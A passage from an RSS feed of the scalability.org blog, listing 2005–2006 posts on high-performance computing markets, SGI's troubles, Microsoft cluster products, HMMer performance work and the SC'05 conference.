      <description>Imagine you have a great idea. You think about it, design it, test it, try it. You approach customers with it and they are very interested. You do the market research, find that the market is growing like banshees, build a busines plan, do all the footwork. Then you go look for capital to make it happen.
So here you are with your great idea, and you see lots of other people starting to have similar inklings.</description>
    </item>
    
    <item>
      <title>A cluster system from Microsoft</title>
      <link>https://blog.scalability.org/2006/06/a-cluster-system-from-microsoft/</link>
      <pubDate>Fri, 09 Jun 2006 16:08:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/06/a-cluster-system-from-microsoft/</guid>
      <description>I had a conversation recently with two nice people from Microsoft about their (now released) WCC product. One of the people, Patrick wrote a comment (for some reason wordpress is editing it, so go to this URL: http://scalability.org/?p=59#comment-40 ) here that is worth looking at.
I have been skeptical of the WCC product in that I didn&amp;rsquo;t understand what Microsoft&amp;rsquo;s vision was for this (no guffaws here), and thought that I might be misinterpreting what I didn&amp;rsquo;t hear.</description>
    </item>
    
    <item>
      <title>An interesting view SGI with some misconceptions</title>
      <link>https://blog.scalability.org/2006/05/an-interesting-view-sgi-with-some-misconceptions/</link>
      <pubDate>Mon, 29 May 2006 16:43:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/an-interesting-view-sgi-with-some-misconceptions/</guid>
      <description>In this post, the author indicates that SGI committed suicide, or at least attempted it twice. Their rationale was that the NT porting bit was the first phase, and that the Itanium choice was the second. Further they posit that there is no value left in the company. I disagree with the first and third points. SGI acquired Cray during the time when we were busy taking away their business. This was IMO, one of the first fatal mistakes.</description>
    </item>
    
    <item>
      <title>The art of benchmarketing (or how to not represent reality in the most positive manner)</title>
      <link>https://blog.scalability.org/2006/05/the-art-of-benchmarketing-or-how-to-not-represent-reality-in-the-most-positive-manner/</link>
      <pubDate>Sun, 28 May 2006 01:54:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/the-art-of-benchmarketing-or-how-to-not-represent-reality-in-the-most-positive-manner/</guid>
      <description>All of us are guilty at some point in time or the other, of embellishing some attribute about something we talk about. We like our choice to be the &amp;ldquo;winner&amp;rdquo;, whatever that means. This &amp;ldquo;crime&amp;rdquo; takes many forms.
What we see quite often is omission, either purposeful or inadvertant which paints a different picture than &amp;ldquo;reality&amp;rdquo; would indicate. We also see specious comparisons, and poor analytics to back up the conclusions.</description>
    </item>
    
    <item>
      <title>A need for (SSE) speed</title>
      <link>https://blog.scalability.org/2006/05/a-need-for-sse-speed/</link>
      <pubDate>Sun, 21 May 2006 06:39:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/a-need-for-sse-speed/</guid>
      <description>Simple problem. You have two &amp;ldquo;vectors&amp;rdquo; of 32 bit signed integers, and you want to do the vector equivalent of vector_a = max_element_by_element(vector_a, vector_b); Can you do this with SSE2?
We need this. Badly. You can always argue that you can use code like this for MAX (or MIN): MAX(a,b) = (a+b + abs(b-a)) &amp;raquo; 1; MIN(a,b) = (a+b - abs(b-a)) &amp;raquo; 1; Of course this is correct, it can be done.</description>
    </item>
    
    <item>
      <title>Update on blog changes</title>
      <link>https://blog.scalability.org/2006/05/update-on-blog-changes/</link>
      <pubDate>Sat, 20 May 2006 19:32:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/update-on-blog-changes/</guid>
      <description>First we have updated Wordpress. Took a while but it was worth it. Second we are getting far more spam than usual, so I have disabled pingback/trackback. I am sorry about this, please email me if this causes you problems. Update: We re-enabled pingback/trackback and implemented some anti-spam technology. Lets see if it works.</description>
    </item>
    
    <item>
      <title>Our Scalable HMMer paper</title>
      <link>https://blog.scalability.org/2006/05/our-scalable-hmmer-paper/</link>
      <pubDate>Fri, 19 May 2006 19:51:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/our-scalable-hmmer-paper/</guid>
      <description>Is available if you would like some good reading from IEEE. For those who don&amp;rsquo;t know, we reworked the p7Viterbi function in the HMMer code, and created a faster version of HMMer in the process. Our measurements put it anywhere from 1.6-2.5x faster than the downloadable binaries from Professor Eddy&amp;rsquo;s site. Since HMMer is GPLed, our patch and binaries are available under that license from our download site. If you wish to distribute binaries that are not covered by GPL or are unwilling to use the GPL for your product and want to distribute this code, please contact us.</description>
    </item>
    
    <item>
      <title>looks out the window checking for porcine shapes aloft ...</title>
      <link>https://blog.scalability.org/2006/05/looks-out-the-window-checking-for-porcine-shapes-aloft/</link>
      <pubDate>Thu, 18 May 2006 23:22:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/looks-out-the-window-checking-for-porcine-shapes-aloft/</guid>
      <description>Dell it seems is about to enter the market with some Opteron units. I don&amp;rsquo;t see any high flying Porcine, and while it is cold today in Michigan, some town here has not frozen over. So what&amp;rsquo;s going on? Seems like the simple economics of the market are testing the loyalty principal of manufacturers. You stick with your suppliers as long as possible, as good relationships can often help smooth over rough patches.</description>
    </item>
    
    <item>
      <title>Whither SGI</title>
      <link>https://blog.scalability.org/2006/05/whither-sgi/</link>
      <pubDate>Sat, 13 May 2006 14:02:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/whither-sgi/</guid>
      <description>Obviously SGI has existential challenges ahead. This means something quite simple. No cow is sacred. No ego&amp;rsquo;s can get in the way of doing the right thing by the shareholders. I will be frank. This is about 9 years too late. First, will SGI recover? Possibly, though I am not going to bet on it. The challenges are not just internal, their competitors have wasted no time in making use of their situation.</description>
    </item>
    
    <item>
      <title>Something cluster-like this way comes</title>
      <link>https://blog.scalability.org/2006/05/something-cluster-like-this-way-comes/</link>
      <pubDate>Thu, 11 May 2006 05:04:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/something-cluster-like-this-way-comes/</guid>
      <description>It appears that Microsoft is about ready to release CCS. This might be interesting, depending upon what was done, and how it all works. Some things to note. It includes a job scheduler. Built into the OS. This is either a really good thing, or a really bad thing. I can see arguments both ways. It includes bits that Linux has had for a while. Remotable/scriptable installation. Multiple security models. Some thoughts.</description>
    </item>
    
    <item>
      <title>... signifying nothing ...</title>
      <link>https://blog.scalability.org/2006/05/signifying-nothing/</link>
      <pubDate>Mon, 08 May 2006 20:25:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/signifying-nothing/</guid>
      <description>I note today that SGI has filed for Chapter 11 protection from its creditors. Whether or not they emerge from bankruptcy is an open question, and one we will surely learn over the next several months. One could talk about everything that led them to where they are now, and no doubt you will see such analyses in the press. Without reading them, I can&amp;rsquo;t tell you how close to the mark they are.</description>
    </item>
    
    <item>
      <title>Interesting NUMA issues in current SuSE kernel</title>
      <link>https://blog.scalability.org/2006/05/interesting-numa-issues-in-current-suse-kernel/</link>
      <pubDate>Mon, 08 May 2006 02:54:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/interesting-numa-issues-in-current-suse-kernel/</guid>
      <description>One of our development systems is a dual socket system with 2 dual core Opteron 275 chips. 4 GB ram, nice disk config, and a quadro fx/1400. This is a good machine t work on. I had set it up with SuSE 9.x, and had left it at 9.3 for quite a while. Recently we upgraded it to SuSE 10.0 Pro. More modern kernel, somewhat updated apps. I thought it would be nice to stay somewhat current.</description>
    </item>
    
    <item>
      <title>Positives and negatives</title>
      <link>https://blog.scalability.org/2006/04/positives-and-negatives/</link>
      <pubDate>Thu, 27 Apr 2006 13:32:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/04/positives-and-negatives/</guid>
      <description>Positive news: My company has been selected to present at the Michigan GCS. This is in line with what we submitted to the 21st century fund a few months ago. Also, we received notes that 2 of our applications had passed compliance screening for this. The end game of this is to ramp up an idea/project/product we have been thinking of and working on for the past several years. The market looks ready for it.</description>
    </item>
    
    <item>
      <title>SCSI vs FC vs SATA</title>
      <link>https://blog.scalability.org/2006/04/scsi-vs-fc-vs-sata/</link>
      <pubDate>Wed, 26 Apr 2006 12:34:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/04/scsi-vs-fc-vs-sata/</guid>
      <description>I have heard this argument come up again several times recently. Lots of folks out there from the enterprise storage realm still love their FC drives. The SCSI crowd like their units. Both handily disparage SATA as being inferior, poorly performing, or with higher failure rates. This is an interesting point. As far as I am aware, all the drives come physically off the same manufacturing production line. The only significant difference between the units that I am aware of (modulo newer motors on newer units) are the electronics that connect to the bus.</description>
    </item>
    
    <item>
      <title>In the limit, as N(cores) -&gt; infinity ...</title>
      <link>https://blog.scalability.org/2006/04/in-the-limit-as-ncores-infinity/</link>
      <pubDate>Fri, 14 Apr 2006 04:28:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/04/in-the-limit-as-ncores-infinity/</guid>
      <description>So way back in the good old days, programming a single core CPU in a high performance manner was a challenge. Compilers promised much and delivered small fractions of maximum theoretical performance. To get nearly optimal performance, you had to hand code assembly language routines. You would never be able to achieve 100% utilization of the processor capabilities, but you might be able to sufficiently balance memory operations with floating point and integer operations so that you were utilizing a sizeable fraction of the chips subsystem capabilities.</description>
    </item>
    
    <item>
      <title>MEDC update</title>
      <link>https://blog.scalability.org/2006/04/medc-update/</link>
      <pubDate>Thu, 13 Apr 2006 22:20:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/04/medc-update/</guid>
      <description>According to the MEDC site, 505 applications were turned in for mostly commercial efforts. 505&amp;hellip; The mind boggles. Of those 505, 139 are commercialization. Another smattering are also commercial, though hidden. Call that 150 commercial ones. In all the previous competitions; the MLSC (Michigan Life Science Corridor), the MTTC (Michigan Tri Technology Corridor), the commercial side was given less than a serious consideration. A token gesture might be a better way to describe it.</description>
    </item>
    
    <item>
      <title>To (open)solaris or not to (open)solaris, that is the question</title>
      <link>https://blog.scalability.org/2006/04/to-opensolaris-or-not-to-opensolaris-that-is-the-question/</link>
      <pubDate>Mon, 10 Apr 2006 16:26:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/04/to-opensolaris-or-not-to-opensolaris-that-is-the-question/</guid>
      <description>Platform consolidation is in full swing in HPC, has been for a while. This is an economic reality. The platforms we are being told by ISVs, that will be supported into the future are Windows and Linux. We don&amp;rsquo;t see much new AIX support. It is simply not a volume platform. Nor do we see much new HP/UX support. It is also not a volume platform. Similarly, we don&amp;rsquo;t see much new Solaris 10 support.</description>
    </item>
    
    <item>
      <title>What OSes will run on the supercomputers of the future?</title>
      <link>https://blog.scalability.org/2006/03/what-oses-will-run-on-the-supercomputers-of-the-future/</link>
      <pubDate>Wed, 29 Mar 2006 03:31:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/what-oses-will-run-on-the-supercomputers-of-the-future/</guid>
      <description>This is not a simple question to answer. It likely will change a few times over the course of time. But we can be reasonably sure that their won&amp;rsquo;t be widespread installations of Irix, AIX, HP/UX and others of their ilk. There are many reasons for this, technological, legal, business, marketing, and so forth. Looking at the top 500 list, it isn&amp;rsquo;t a high risk bet that Linux will remain in some form or the other.</description>
    </item>
    
    <item>
      <title>HPC in the critical path</title>
      <link>https://blog.scalability.org/2006/03/hpc-in-the-critical-path/</link>
      <pubDate>Tue, 28 Mar 2006 04:07:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/hpc-in-the-critical-path/</guid>
      <description>Is high performance computing a critical path technology? Is it a technology that you cannot do without? This is a question some potential partners were discussing this evening. Very interesting question. If HPC is not critical, then demand for it should be quite moderate. If it is not critical, then the market would have basically replacement level growth rates. If end users did not see a value in HPC, they wouldn&amp;rsquo;t use it, as their time would be spent elsewhere.</description>
    </item>
    
    <item>
      <title>The coming of the &#34;grid&#34; (the hopefully hype-free or hype-reduced model that is)</title>
      <link>https://blog.scalability.org/2006/03/the-coming-of-the-grid-the-hopefully-hype-free-or-hype-reduced-model-that-is/</link>
      <pubDate>Tue, 21 Mar 2006 21:42:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/the-coming-of-the-grid-the-hopefully-hype-free-or-hype-reduced-model-that-is/</guid>
      <description>Someone gets it. I can&amp;rsquo;t say much more now, or even point to who gets it. Then again, with all companies and decisions comes baggage. While they get the idea, there is this little manner of the baggage they attached to their grid to fix another problem. Customers bringing application code over to their grid, are going to be in for a surprise. Sometimes your baggage has been creatively destroyed by other newer baggage, and you have to live with that.</description>
    </item>
    
    <item>
      <title>Are we back to bubble-nomics again?</title>
      <link>https://blog.scalability.org/2006/03/are-we-back-to-bubble-nomics-again/</link>
      <pubDate>Mon, 20 Mar 2006 13:42:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/are-we-back-to-bubble-nomics-again/</guid>
      <description>I know, its dangerous to Post Before Coffee (PBC) in the morning. It increases the possibility of missing critical features of an argument, and there tends to be more bloviation, stream of approximately conciousness, and so forth. I read an article this morning from the Wall Street Journal&amp;rsquo;s WSJ.com site that evoked many emotions and thoughts. This article was entitled &amp;ldquo;Silicon Valley Start-Ups See Cash Everywhere&amp;rdquo; with several basic points being made:</description>
    </item>
    
    <item>
      <title>Michigan&#39;s 21st Century Jobs Fund</title>
      <link>https://blog.scalability.org/2006/03/michigans-21st-century-jobs-fund/</link>
      <pubDate>Thu, 16 Mar 2006 14:46:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/michigans-21st-century-jobs-fund/</guid>
      <description>Competition is in full swing. This is the first year it is (mostly) well designed to make a difference to Michigan. Kudos for the folks that resisted the pressure to make this identical to the MTTC/MLSC of prior years. You can still see echos of that pressure, but I expect this to be a very exciting year with interesting proposals that will have a net positive benefit for Michigan if some are funded.</description>
    </item>
    
    <item>
      <title>It is a tale Told by an idiot, full of sound and fury, Signifying nothing.</title>
      <link>https://blog.scalability.org/2006/03/it-is-a-tale-told-by-an-idiot-full-of-sound-and-fury-signifying-nothing/</link>
      <pubDate>Wed, 08 Mar 2006 06:13:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/it-is-a-tale-told-by-an-idiot-full-of-sound-and-fury-signifying-nothing/</guid>
      <description>SGI announced another RIF. Thats more good people tossed onto the street. Thats good technology about to be or already dumped. SGI and I go way back, to 1993 when I started running molecular dynamics simulations on SGI machines. These machines were fast (those R3000&amp;rsquo;s were like butta &amp;hellip;). I liked them so much, and liked playing with them so much that I joined the company straight out of graduate school.</description>
    </item>
    
    <item>
      <title>significant growth in HPC markets</title>
      <link>https://blog.scalability.org/2006/03/significant-growth-in-hpc-markets/</link>
      <pubDate>Tue, 07 Mar 2006 14:26:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/significant-growth-in-hpc-markets/</guid>
      <description>IDC is out with its estimated numbers, based upon 3 quarters of data, and one quarter of estimated data. The summary is amazing. 20+% CAGR for this market. It is about 9B$ (yes, that is a B meaning billion or 10^9, which is 10**9 for old timers). It is growing about 1.8B$/year at the present. Clusters are growing 60-90% per year. And so on. This is tremendously exciting. HPC demand is huge and getting larger.</description>
    </item>
    
    <item>
      <title>Amusing</title>
      <link>https://blog.scalability.org/2006/02/amusing/</link>
      <pubDate>Tue, 28 Feb 2006 14:02:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/02/amusing/</guid>
      <description>The IBM folks have turned the Blue Gene into what they claim is the worlds fastest blast engine. Interesting read. They use our A. thaliana data in the Bioinformatics Benchmark System v3 (BBS) to perform their measurement, as well as data from Aaron Darling for mpiBLAST. Our data had been in a mislabeled file for years, and I never took the time to rename the S. lycopersicum for the original Arabidopsis.</description>
    </item>
    
    <item>
      <title>Thoughts on Microsoft cluster offerings</title>
      <link>https://blog.scalability.org/2006/02/thoughts-on-microsoft-cluster-offerings/</link>
      <pubDate>Thu, 23 Feb 2006 15:08:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/02/thoughts-on-microsoft-cluster-offerings/</guid>
      <description>I haven&amp;rsquo;t seen it yet. Eventually when I get more time, I want play with it, but from what I have heard it is not ready for prime time yet. That said, I would like note that the Cygwin tools are really good. I just built LAM-7.1.1 using them. Tried it out and it works quite nicely (at least on this box). A major coup for Microsoft would be if they tossed their existing SFU bit and used Cygwin.</description>
    </item>
    
    <item>
      <title>The difference between an architecture and a product [part 2]</title>
      <link>https://blog.scalability.org/2006/02/the-difference-between-an-architecture-and-a-product-part-2/</link>
      <pubDate>Sun, 19 Feb 2006 04:43:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/02/the-difference-between-an-architecture-and-a-product-part-2/</guid>
      <description>More reflections on the differences between architectures and products. Beowulf and most cluster systems are architectures to be built. Many vendors attempt to freeze the architecture, or restrict variations of it in order to build a polished product. Polished products are finished. They have a finished feel to them. Someone went through and actually made stuff work, identified broken stuff, and had someone fix them. Well, not all clusters are like this, some feel like stacked boxes that the cluster vendor could get at a low price, as the cluster vendor knows how to spell HPC, but not do it.</description>
    </item>
    
    <item>
      <title>Of business models, and business reality</title>
      <link>https://blog.scalability.org/2006/02/of-business-models-and-business-reality/</link>
      <pubDate>Sun, 19 Feb 2006 04:40:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/02/of-business-models-and-business-reality/</guid>
      <description>High performance computing is a tough business. Customers always want more performance. Few want to pay more for this performance. Many vendors want to serve this market but precious few are pushing more than boxes. Its easy to push boxes, and the really low end vendors, likely having been burned as suppliers of low end windows machines, decided to work on clusters. Occasionally there are some good ideas. Some really good ones.</description>
    </item>
    
    <item>
      <title>The marketing of computer  languages</title>
      <link>https://blog.scalability.org/2006/01/the-marketing-of-computer-languages/</link>
      <pubDate>Wed, 11 Jan 2006 19:53:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/01/the-marketing-of-computer-languages/</guid>
      <description>I have noticed a tendency for technologists, programmers, and others to fall in love with their projects, their tools, &amp;hellip; . Why this happens, I am not sure. I don&amp;rsquo;t love my hammer, my circular saw, my computers, the languages I use. They are tools. They are the means to a goal. Sure, I like some tools more than others, but I am also not going to waste my time misusing a tool for a purpose ill suited for it.</description>
    </item>
    
    <item>
      <title>Is a cluster a toaster?</title>
      <link>https://blog.scalability.org/2006/01/is-a-cluster-a-toaster/</link>
      <pubDate>Thu, 05 Jan 2006 02:34:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/01/is-a-cluster-a-toaster/</guid>
      <description>At the excellent Cluster Monkey Doug Eadline mused on a number of topics of interest, specifically on why Cluster HPC is hard. There were some excellent points made. The OSC is working on an initiative to increase access to high performance computing resources for end users. Their effort is in part by making access to HPC hardware easier, and in part by helping people (users and commercial entities) make better use of computational gear.</description>
    </item>
    
    <item>
      <title>The difference between an architecture and a product</title>
      <link>https://blog.scalability.org/2006/01/the-difference-between-an-architecture-and-a-product/</link>
      <pubDate>Wed, 04 Jan 2006 08:32:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/01/the-difference-between-an-architecture-and-a-product/</guid>
      <description>This will be a short comment on something I have noticed with engineering led startups. The hardware oriented ones tend to have really neat architectures. Everything is technically beautiful. One problem though. They are not products. A product is finished. It has all the features one might expect out of a product. Yeah, this is a tautology. You don&amp;rsquo;t buy a car with the engine inserted, but no fuel lines hooked up, no instrumentation attached.</description>
    </item>
    
    <item>
      <title>Broken makefiles</title>
      <link>https://blog.scalability.org/2006/01/broken-makefiles/</link>
      <pubDate>Wed, 04 Jan 2006 08:23:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/01/broken-makefiles/</guid>
      <description>I remain consistently amused by the makefiles we see. Some of them are broken beyond repair. If I told you where I found them, and the profile of the projects that they were in, you would have a hard time stopping laughing. No, I am not talking about the auto-generated monstrosities from the GNU auto-tools. I am talking about hand written, and for the most part, borked beyond simple repair. Since I get to teach a nice class on HPC applications shortly, I plan to cover the do&amp;rsquo;s and don&amp;rsquo;ts of makefiles.</description>
    </item>
    
    <item>
      <title>HPC Sales and Technical position open</title>
      <link>https://blog.scalability.org/2005/12/hpc-sales-and-technical-position-open/</link>
      <pubDate>Sat, 10 Dec 2005 07:32:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/12/hpc-sales-and-technical-position-open/</guid>
      <description>Please see [http://www.scalableinformatics.com/metadot/index.pl?iid=2179&amp;amp;#jobsfor more details.</description>
    </item>
    
    <item>
      <title>SC&#39;05 wrap up</title>
      <link>https://blog.scalability.org/2005/12/sc05-wrap-up/</link>
      <pubDate>Sat, 03 Dec 2005 05:06:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/12/sc05-wrap-up/</guid>
      <description>This took me a while to post in part due to heavy year end load, but also, that I wanted to think through what I did see, and what I didn&amp;rsquo;t. It is important in many processes to take a moment, step back from where you are, and try to assemble the bigger picture of the situation. This introspection can yield invaluable insights. Failing to do it can blind you to what was there, with you focusing mostly on the minutae.</description>
    </item>
    
    <item>
      <title>Till we meet again ... in Tampa! (not Orlando... Do&#39;h!)</title>
      <link>https://blog.scalability.org/2005/11/till-we-meet-again-in-orlando/</link>
      <pubDate>Thu, 17 Nov 2005 21:48:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/till-we-meet-again-in-orlando/</guid>
      <description>Well, this is the day we had to leave. We saw many things, met many people, had many good conversations. Oddly enough we did not have time to attend talks. I sat in on one BOF. Here is what I observed. IBM is pushing Blue Gene everywhere. In the sessions I did see or hear about from others, it appears that IBM operatives/employees were trying to make a case, even when told that infinite speed wasn&amp;rsquo;t the issue.</description>
    </item>
    
    <item>
      <title>SC&#39;05 sessions</title>
      <link>https://blog.scalability.org/2005/11/sc05-sessions/</link>
      <pubDate>Wed, 16 Nov 2005 15:07:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/sc05-sessions/</guid>
      <description>We had wanted to see several of the sessions including the ClawHmmer, and various others. I spent most of my time talking with various vendors and others on the show floor. ClawHmmer is interesting as it is a GPU version of HMMer, and on good GPU hardware, you can get quite a performance boost on HMMer. The only problem we see is that most servers don&amp;rsquo;t have good hardware accelerated GPUs.</description>
    </item>
    
    <item>
      <title>SC&#39;05 full day 1 (Tuesday)</title>
      <link>https://blog.scalability.org/2005/11/sc05-full-day-1-tuesday/</link>
      <pubDate>Wed, 16 Nov 2005 06:36:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/sc05-full-day-1-tuesday/</guid>
      <description>This morning, SC&#39;05 featured a keynote address from Bill Gates, CTO and founder of Microsoft. Prior to the keynote, we watched a video loop, and we heard from the heads of the ACM, and the president-elect of the IEEE, as well as the chairperson of the board for SC&#39;06 in Tampa Florida. The president-elect gave a good and short talk on a number of things, including the need to get more women and minorities into the profession.</description>
    </item>
    
    <item>
      <title>SC&#39;05 begins ...</title>
      <link>https://blog.scalability.org/2005/11/sc05-begins/</link>
      <pubDate>Tue, 15 Nov 2005 08:16:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/sc05-begins/</guid>
      <description>At 7pm PST the network was officially lit with the_ traditional cutting of the optical fibre_, then a ribbon was cut with a large pair wooden handled scissors. Long lines were formed, and much food was consumed. The best thing I saw at the show today is the LightSpace Technology display. The molecular display demo is great, as was the visual human work. The way it works is a very bright digital light pipe technology coupled with diffusive planes for drawing images.</description>
    </item>
    
    <item>
      <title>Setup day batch 1</title>
      <link>https://blog.scalability.org/2005/11/setup-day-batch-1/</link>
      <pubDate>Mon, 14 Nov 2005 21:11:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/setup-day-batch-1/</guid>
      <description>The first batch of setup day photos are up from SC&#39;05. I am on the show floor looking about, talking with people thanks to the Cluster Monkies, andLinux Magazine. Looks to be an interesting show. Please be gentle on my picture taking skills, I am still getting used to this camera. Yes, I did delete pictures of the carpet &amp;hellip; I&amp;rsquo;ll write some comments on what I saw a little later.</description>
    </item>
    
    <item>
      <title>SC&#39;05 T -1 and counting</title>
      <link>https://blog.scalability.org/2005/11/sc05-t-1-and-counting/</link>
      <pubDate>Mon, 14 Nov 2005 16:05:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/sc05-t-1-and-counting/</guid>
      <description>The Sun HPCC group had some nice talks from folks doing real science. Specifically I did get to see a talk on path-integral formalism of molecular dynamics, another on using support vector machines for feature identification in patients with Glaucoma. Also saw quite a bit of stuff we cannot talk about, but it was quite interesting. All in all, a fun time was had by all, but we cannot post pictures as most of the bits were under non-disclosure.</description>
    </item>
    
    <item>
      <title>Conference: T -2 days and counting</title>
      <link>https://blog.scalability.org/2005/11/conference-t-2-days-and-counting/</link>
      <pubDate>Sun, 13 Nov 2005 14:29:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/conference-t-2-days-and-counting/</guid>
      <description>I am here at the Sun HPCC meeting, as they had asked us for a talk on Opteron performance on single and dual core processors for life and chemical science applications. At this talk we gave a peek at our recent HMMer and NCBI BLAST performance among other things. For HMMer, we believe we currently have the fastest build on Opteron. In some of our benchmark tests, we are very close to a factor of 2 faster than the same machine running the canonical version.</description>
    </item>
    
    <item>
      <title>Planes, and automobiles (no trains)</title>
      <link>https://blog.scalability.org/2005/11/planes-and-automobiles-no-trains/</link>
      <pubDate>Sat, 12 Nov 2005 08:08:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/planes-and-automobiles-no-trains/</guid>
      <description>Got here&amp;hellip; finally. Seattle is largely sold out of hotel rooms, so I had to get rooms near the airport. Only a short drive to the conference. Could be worse. Weather is cool (a.k.a freezing for those from warmer climates) and wet. The car rental person started telling me all about how many times his car was smashed into, right after I declined the extra coverage&amp;hellip; Hmmm&amp;hellip;. Maybe that old axiom is in place, the selling starts when the customer says &amp;ldquo;no&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Questions to answer at SC05</title>
      <link>https://blog.scalability.org/2005/11/questions-to-answer-at-sc05/</link>
      <pubDate>Fri, 11 Nov 2005 14:51:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/questions-to-answer-at-sc05/</guid>
      <description>So there should be lots of folks at SC05 to answer questions about technology, products, performance, TCO, and most anything else connected with supercomputing you could want to ask. Some questions I want to ask are from the good folks at Microsoft (Bill Gates is giving the opening keynote), what specifically their HPC initiative is supposed to give us that we don&amp;rsquo;t already have? This is not an OS war, or OSS zealotry, just a simple question as to what their offering will bring to the table.</description>
    </item>
    
    <item>
      <title>Anticipation</title>
      <link>https://blog.scalability.org/2005/11/anticipation/</link>
      <pubDate>Thu, 10 Nov 2005 13:48:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/anticipation/</guid>
      <description>Much has changed in a year. Last year, a number of companies such as Orion were on the rise and the darlings of the event. Companies such as my former employer SGI had a strong presence, reasonable revenues, and there were thoughts of a possible turn around. Startups that garnered far less attention than they deserved, such as Ammasso were there in a limited fashion. Other startups (mercifully unamed) that had something of a flash-in-the-pan quality to them seemed abundant.</description>
    </item>
    
    <item>
      <title>Blogging SC05</title>
      <link>https://blog.scalability.org/2005/11/blogging-sc05/</link>
      <pubDate>Wed, 09 Nov 2005 16:07:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/blogging-sc05/</guid>
      <description>Please look for us at SC05. I&amp;rsquo;ll be there with a camera and we have a nice site ready to display photos. Some changes from last year. Orion is not in ascendance. Ammasso is out of the game. The buzz is all around FPGAs (just wait until someone tries to port &amp;ldquo;hello world&amp;rdquo; .c to it, but thats another matter). Intel has an x86_64 chip line out. Go figure.</description>
    </item>
    
    <item>
      <title>Venture capital and  high performance computing</title>
      <link>https://blog.scalability.org/2005/10/venture-capital-and-high-performance-computing/</link>
      <pubDate>Wed, 12 Oct 2005 14:30:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/10/venture-capital-and-high-performance-computing/</guid>
      <description>Its a very big HPC world. According to IDC and others, its a $7B+/year world, growing at a nice healthy clip, 10-20% CAGR, again, depending upon which market research report you read. Seems like a hot market&amp;hellip; right? Well &amp;hellip; sort of. The largest growth (&amp;gt;15% CAGR) is in the 10-25k$US region (small computing engines), with the higher end stuff coming in at a somewhat anemic (~5% CAGR) rate. Still, a 5% growth rate in a market this large is nothing to sneeze at.</description>
    </item>
    
  </channel>
</rss>
